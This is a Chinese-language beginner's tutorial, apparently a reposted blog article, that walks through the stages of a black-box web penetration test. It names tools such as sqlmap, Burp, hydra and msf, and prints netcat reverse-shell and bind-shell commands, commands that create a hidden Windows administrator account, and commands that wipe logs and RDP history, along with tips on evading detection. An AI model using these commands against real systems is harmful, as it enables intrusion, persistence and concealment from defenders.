Web渗透测试

时间：2019-09-03 14:46:27 来源：作者：

Web渗透测试分为白盒测试和黑盒测试，白盒测试是指目标网站的源码等信息的情况下对其渗透，相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透，以下所说的Web渗透就是黑盒渗透。

Web渗透分为以下几个步骤，信息收集，漏洞扫描，漏洞利用，提权，内网渗透，留后门，清理痕迹。一般的渗透思路就是看是否有注入漏洞，然后注入得到后台管理员账号密码，登录后台，上传小马，再通过小马上传大马，提权，内网转发，进行内网渗透，扫描内网c段存活主机及开放端口，看其主机有无可利用漏洞（nessus）端口（nmap）对应服务及可能存在的漏洞，对其利用（msf）拿下内网，留下后门，清理痕迹。或者看是否有上传文件的地方，上传一句话木马，再用菜刀链接，拿到数据库并可执行cmd命令，可继续上大马.........思路很多，很多时候成不成功可能就是一个思路的问题，技术可以不高，思路一定得骚。

信息收集

信息收集是整个流程的重中之重，前期信息收集的越多，Web渗透的成功率就越高。

DNS域名信息：通过url获取其真实ip,子域名(Layer子域名爆破机)，旁站(K8旁站，御剑1.5)，c段，网站负责人及其信息（whois查询）

整站信息：服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(MySQL/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型；

网站常见搭配为：

ASP和ASPX：ACCESS、SQLServer

PHP：MySQL、PostgreSQL

JSP：Oracle、MySQL

敏感目录信息（御剑，dirbust）

开放端口信息（nmp）

漏洞扫描

利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描，看其是否有可利用漏洞。

常见漏洞：

SQL注入

XSS跨站脚本

CSRF跨站请求伪造

XXE(XML外部实体注入)漏洞

SSRF(服务端请求伪造)漏洞

文件包含漏洞

文件上传漏洞

文件解析漏洞

远程代码执行漏洞

CORS跨域资源共享漏洞

越权访问漏洞

目录遍历漏洞和任意文件读取/下载漏洞

漏洞利用

用工具也好什么也好对相应漏洞进行利用

如：

Sql注入（sqlmap）

XSS（BEEF）

后台密码爆破（burp）

端口爆破（hydra）

提权

获得shell之后我们权限可能很低，因此要对自己提权，可以根据服务器版本对应的exp进行提权，对于windows系统也可看其补丁对应漏洞的exp进行提权

内网渗透

首先进行端口转发可用nc

nc使用方法：

反向连接

在公网主机上进行监听：

nc-lvp 4444

在内网主机上执行：

nc-e cmd.exe 公网主机ip4444

成功之后即可得到一个内网主机shell

正向连接

远程主机上执行：

nc-l -p 4444 -t -e cmd.exe

本地主机上执行：

nc-vv 远程主机ip4444

成功后，本地主机即可远程主机的一个shell

然后就是对内网进行渗透了，可以用主机漏洞扫描工具（nessus,x-scan等）进行扫描看是否有可用漏洞，可用msf进行利用，或者用nmap扫描存活主机及开放端口，可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门

留后门

对于网站上传一句话木马，留下后门

对于windows用户可用hideadmin创建一个超级隐藏账户

手工：

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

这样的话在cmd命令中看不到，但在控制面板可以看到，还需要改注册表才能实现控制版面也看不到，太过麻烦，不多赘述，所以还是用工具省心省力。

痕迹清理

日志清理：在win环境下的话用msf清理，命令如下：

runclearlogs

clearev

如果在Liunx环境下：

rm-f -r /var/log删除/var/log下的文件

exportHISTSIZE=0export HISTSIZE=0删除bashshell保存的最后500条命令

3389远程登陆记录清除：

@echooff

@regdelete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal

ServerClientDefault" /va /f

@del"%USERPROFILE%My DocumentsDefault.rdp" /a

@exit

另外在渗透时尽量用代理以免轻易的暴露自己ip。

本人呢，也是个刚入安全圈的菜鸡，以上是在学习中对渗透过程的一点总结，大牛勿喷，希望可以帮到那些刚刚入门的信息安全爱好者。

相关练习

渗透综合场景演练：利用自己学习到的知识对目标进行渗透测试，获取目标系统的权限，从而获取敏感信息，那么恭喜你，你已经完成了从安全小白到渗透测试工程师的蜕变。

Tags：Web渗透点击:() 评论:()

声明：本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com)，我们将及时更正、删除，谢谢。

▌相关推荐

Web渗透测试——密码学基础

我们在渗透测试过程中，往往会遇到一些我们看不懂的代码，一般人都称之为乱码，往往都不会太在意，然而有一些所谓的乱码，其实是通过各种手段加密过的重要信息，只要知道它的加密方法，就...【详细内容】

2021-02-25　　Tags: Web渗透点击:(248)　　评论:(0)　　加入收藏

Web渗透从App寻找攻击面的几个方法

声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释...【详细内容】

2020-09-07　　Tags: Web渗透点击:(336)　　评论:(0)　　加入收藏

Web渗透测试(信息收集)

划定了测试范围后，就需要进行信息收集了！通过各种公开资源获取测试目标的相关信息！(收集服务器的配置信息和网站的敏感信息，包括域名及子域名信息，目标网站系统、CMS指纹、目标网...【详细内容】

2020-08-31　　Tags: Web渗透点击:(160)　　评论:(0)　　加入收藏

Web渗透测试——验证码自动识别工具

我们在网站登录界面，为了安全起见，除了填写用户名和密码之外，还会要求用户输入验证码才能进行登录，验证码的作用最主要的是验证输入方是一个在电脑前正在输入的人，而不是某些程序...【详细内容】

2020-08-28　　Tags: Web渗透点击:(194)　　评论:(0)　　加入收藏

WEB渗透——MySQL注入原理与注入检测

MySQL注入原理SQL，叫做结构化的查询语言，所谓的SQL注入，就是把SQL命令插入到web表单提交或输入域名页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它就...【详细内容】

2020-08-17　　Tags: Web渗透点击:(151)　　评论:(0)　　加入收藏

Web渗透测试——一句话木马与中国菜刀

一句话木马是Webshell的一种，那什么是Webshell？先讲讲什么是shell。Shell是系统的用户界面，提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执...【详细内容】

2020-08-11　　Tags: Web渗透点击:(384)　　评论:(0)　　加入收藏

黑客术语介绍！web渗透小白的进阶之路

每个行业都有自己的专属术语，如果你知道这些术语，那你可能连小白都不算。黑客专属术语就像是大门的钥匙，你只有掌握钥匙，你才能真真正正的进入其中。ip地址：就是你电脑的一个编号...【详细内容】

2020-08-07　　Tags: Web渗透点击:(159)　　评论:(0)　　加入收藏

web渗透测试——数据库攻击技巧整理

数据库是一个网站最重要的组成部分，它存储着整个站点许多重要的信息，包括：用户登录信息、配置信息、用户存储的信息等，攻击者从开始的信息收集到发现利用漏洞再到最后提高权限，最...【详细内容】

2020-08-06　　Tags: Web渗透点击:(116)　　评论:(0)　　加入收藏

Web渗透实战进阶：利用SQL二次注入渗透服务器，修改用户密码

什么是二次注入？恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中，当Web程序调用存储在数据库中的恶意数据并执行SQL查询时，就发生了SQL二次注入。本课二次注入思...【详细内容】

2020-06-09　　Tags: Web渗透点击:(324)　　评论:(0)　　加入收藏

Web渗透流程、Windows基础、注册表及黑客常用DOS命令

一.常用术语常用术语包括：脚本（asp、php、jsp）：编写网站的语言html（css、js、html）：超文本标记语言，解释给浏览器的静态编程语言HTTP/HTTPS协议：通讯标准，明文或密文CMS（B/S）：网站内容管...【详细内容】

2020-05-31　　Tags: Web渗透点击:(396)　　评论:(0)　　加入收藏

▌简易百科推荐

最近160 万个 WordPress 网站被黑客攻击，黑客仅通过4个不同插件

在最近的一波攻击中，黑客利用多个插件中未修补的漏洞攻击了 160 万个 WordPress 网站。易受攻击的插件对 WordPress 网站产生了的巨大攻击数据。 Wordfence 最近发现 WordPr...【详细内容】

2021-12-16　　蚁安　　　　Tags:WordPress 　点击:(9)　　评论:(0)　　加入收藏

一起SSH暴力破解

事件起因从安全分析系统里面发现一条带有病毒的下载，然后针对这条记录展开了一系列的分析分析过程1.登录到被感染服务器，查看系统状况，hadoop 这个用户在 2020/6/18 20:32 从这...【详细内容】

2021-11-23　　Z2990Lig　　　　Tags:SSH 　点击:(32)　　评论:(0)　　加入收藏

服务器如何防范入侵

1、除了服务器需要用的一些正规软件，其它都不要安装。2、在用户中把administrator改名,这样做的目的是即使对方暴破了我们的密码用户名也不容易猜住，相当于又加了一道关卡。...【详细内容】

2021-11-01　　IT小哥吧　　　　Tags:服务器　点击:(37)　　评论:(0)　　加入收藏

白帽黑客教你Windows主机操作系统安全加固

账户安全（1）更名administrator本地用户并禁用guest账户步骤：点击“开始”，找到“管理工具”，点击里面的“计算机管理”，找到“本地用户和组” （2）设定账户锁定策略尝试5次失败...【详细内容】

2021-10-12　　Kali与编程　　今日头条　　Tags:Windows主机　点击:(62)　　评论:(0)　　加入收藏

企业服务器安全篇之Windows Server

本文主要介绍以Microsoft的Windows Server 2019 ，版本：Datacenter(Domain Controller)安全加固保护.企业随着规模不断扩大，业务增多，信息安全建设是企业里一条只有重点没有终点...【详细内容】

2021-09-17　　Vireshark　　　　Tags:服务器安全　点击:(64)　　评论:(0)　　加入收藏

Windows系统安全 | IPC$共享和其他共享(C$、D$、Admin$)

目录常见共享命令IPC$IPC$的利用条件1：开启了139、445端口2：目标主机开启了IPC$共享3：IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么？di...【详细内容】

2021-09-16　　网络说安全　　　　Tags:系统安全　点击:(86)　　评论:(0)　　加入收藏

服务器如何防止被cc攻击？被cc攻击了怎样处理

昨天一个老哥找到我，说他的服务器这几天一直被CC攻击，问我这边有没有什么解决的方法？近年来，网络攻击事件越来越频繁，最常见的就是CC攻击和DDOS攻击，主要的区别就是针对的对象不...【详细内容】

2021-09-10　　小蚁GDRAGON　　　　Tags:cc攻击　点击:(58)　　评论:(0)　　加入收藏

黑科技展示，一种无法被暴力破解的登录方式

网站页面上的登录操作，通常都是输入帐号密码，传输至网站后台验证。在网站页面、数据传输中，通过技术手段，都可以得到用户输入的信息，并可以修改，从而发起网络攻击。典型的如：使用自...【详细内容】

2021-08-30　　修丹道的程序猿　　　　Tags:登录方式　点击:(62)　　评论:(0)　　加入收藏

托管 DNS 云服务器中的漏洞让攻击者监视 DNS 流量

网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞，这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】

2021-08-12　　零日时代　　　　Tags:漏洞　点击:(66)　　评论:(0)　　加入收藏

登陆框有多危险，可能你还不知道？

001暴力破解1. 指定用户名爆破密码传统型爆破思路，用户名可以通过猜测或者信息收集获得。猜测：admin、网站域名等信息收集：新闻发布人、whoami等2. 指定密码爆破用户名如果是后...【详细内容】

2021-07-23　　KaliMa　　今日头条　　Tags:登陆框　点击:(85)　　评论:(0)　　加入收藏

推荐资讯

聊聊如何自定义数据脱	河南人到底有多爱吃面
人称“犬中四煞”的4	离婚后，约定每月给孩子
“三皇五帝”分别是哪	印度低种姓群体如何翻
日本研发“飞行摩托”	2021年Steam最畅销游

无相关信息